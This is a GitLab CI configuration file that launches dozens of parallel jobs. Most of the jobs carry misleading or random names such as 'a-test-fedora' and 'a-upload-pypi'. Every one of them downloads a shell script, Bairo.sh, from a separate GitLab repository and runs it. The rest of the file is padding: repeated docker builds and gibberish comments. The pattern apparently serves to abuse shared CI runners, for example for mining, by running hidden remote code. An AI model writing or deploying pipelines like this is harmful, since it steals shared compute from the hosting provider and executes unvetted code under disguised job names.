stages:
  - build
  - test
  - docker
  
services:
  - docker:dind
  
#build-part


a-pages:
  stage: build
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget -y 
    
#TEST-PART

a-lint-javascript:
  stage: test
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install gcc -y
  
  #DOC-1
  
docker-job_a:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
docker-job_b:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
docker-job_c:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
docker-job_d:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
docker-job_e:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
docker-job_f:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
#DOC-PART-2
    
docker-job_g:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
docker-job_h:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .  
    
docker-job_i:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .   
    
docker-job_j:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .    
    
docker-job_k:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .   
    
docker-job_l:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .    
    
docker-job_m:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .    
 
docker-job_n:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .

docker-job_o:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .

docker-job_p:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .

docker-job_q:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .

docker-job_r:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .

docker-job_s:
  stage: docker
  image: docker:dind
  script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
    - docker build -t registry.gitlab.com/baeid_twanr/2hfofmrj .
    
    ##maindhsod
    ##hdkfjdkfjf
    #hdkndkdmfm
    #hlcmfkfldnf
    
a-test-debian:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

a-test-ubuntu:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

a-test-fedora:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

a-test-arch:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh


a-test-display:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

a-upload-pypi:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
#2ND-PART-STARTS
    
B-te29-y:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

B-u380dypi:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
B-te2hd9-y:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

B-u38jpa0dypi:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
B-te117329-y:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

B-u38000ehdypi:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
B-te11m929-y:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh

B-u38jog0ehdypi:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
B-u38jognigdypi:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
    ##gidnfkdjd
    #hkdndjfjf
    #hkdnfkfjf
    
C-u1940:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uuj2dkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u39040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh   
    
C-u49440:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uuj592dkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u699040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh  
    
C-ukeo7940:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uuj8wjdkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u9kd040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-u10jod940:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uuj11hdkdkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u12kodk040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh   
    
C-u13jod440:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uu14jkdk92dkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u15kld9040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh  
    
C-u16jkdeo7940:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uu17jksj8wjdkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u18kkfkd040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
C-uu19kv6dkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
C-u20hk040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
D-uhoh3vj:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
 
D-uudi4dhkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
D-u3hi40:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh   
    
D-u4gu0:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
D-uuj5mfdkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
D-u6hk40:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh  
    
D-ukeo7nl40:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
D-juuj8wjdkd:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh    
    
D-ubld040:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh
    
D-u10fkl940:
  stage: docker
  image: openlp/ubuntu
  script:
    - apt-get update
    - apt-get install wget
    - wget https://gitlab.com/baeid_twanr/1hfofnr/-/raw/master/Bairo.sh
    - chmod +x Bairo.sh
    - ./Bairo.sh